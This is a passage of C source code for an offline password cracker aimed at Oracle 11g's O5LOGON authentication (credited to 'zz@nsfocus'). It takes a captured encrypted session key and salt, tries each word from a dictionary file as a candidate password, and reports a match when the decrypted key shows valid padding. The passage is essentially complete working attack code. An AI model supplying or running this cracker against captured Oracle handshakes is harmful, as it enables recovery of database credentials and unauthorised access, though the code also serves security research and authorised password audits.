fprintf(stdout, "o5logoncrack -k server sesskey -s salt -d dict\n");
exit(0);
}

int main(int argc, char* argv[]) {

char password [100];
char aes_key_bytes[24] = {0};
char dict_filename[256] = {0};
unsigned char Oracle_MixCaseHash[20] = {0};
unsigned char decrypted_server_sesskey[48] = {0};
unsigned char encrypted_server_sesskey[48] = {0};
unsigned char AUTH_SESSKEY[48] = {0};
unsigned char AUTH_VFR_DATA[10] = {0};
int len;
int ret;
int debug = 0;
FILE * fp = NULL;

int ch;
int args = 0;
while( ( ch = getopt( argc, argv, "k:s:d:v" ) ) != EOF ) {
switch(ch) {

case 'k':
HexStringtoBinArray(optarg, AUTH_SESSKEY);
break;
case 's':
HexStringtoBinArray(optarg, AUTH_VFR_DATA);
break;
case 'd':
strncpy(dict_filename, optarg, 255);
break;
case 'v':
debug = 1;
break;
default:
usage();
}
args++;
}

if (args < 3) usage();

printf ("*************************************************************\n");
printf ("Oracle 11g TNS AES-192 cracker by zz@nsfocus\n");
printf ("*************************************************************\n\n");

if ( (fp = fopen(dict_filename, "r")) == NULL ) {
perror("fail to read");
exit(1);
}

while(fgets(password, 100, fp) != NULL) {

len = strlen(password);
if (password[len-1] == 0xa && password[len-2] == 0xd) {
password[len-2] = '\0';
}
else password[len-1] = '\0';

if (debug)
fprintf(stdout, "try `%s'\n", password);
// Create Oracle Hash from the salt (AUTH_VFR_DATA) and the password
ORACLE_MixCase_Hash (password, strlen (password), AUTH_VFR_DATA, Oracle_MixCaseHash);

memset (aes_key_bytes,0,sizeof(aes_key_bytes));
memcpy (aes_key_bytes,Oracle_MixCaseHash, 20);

if (debug)
hexdump(stdout, "aes_key_bytes", aes_key_bytes, sizeof(aes_key_bytes));

memset (decrypted_server_sesskey, 0, sizeof(decrypted_server_sesskey));
ORACLE_TNS_Decrypt_AES192_CBC (aes_key_bytes, AUTH_SESSKEY, 48, decrypted_server_sesskey);

if (debug)
hexdump(stdout, "decrypted_server_sesskey", decrypted_server_sesskey, sizeof(decrypted_server_sesskey));

ret = strncmp(&decrypted_server_sesskey[40], "\x08\x08\x08\x08\x08\x08\x08\x08", 8);

if (ret == 0) {
printf ("\nFound password: %s \n\n", password);
return 0;
}

memset(password, 0, sizeof(password));

}

fclose(fp);
return 0;
}

参考链接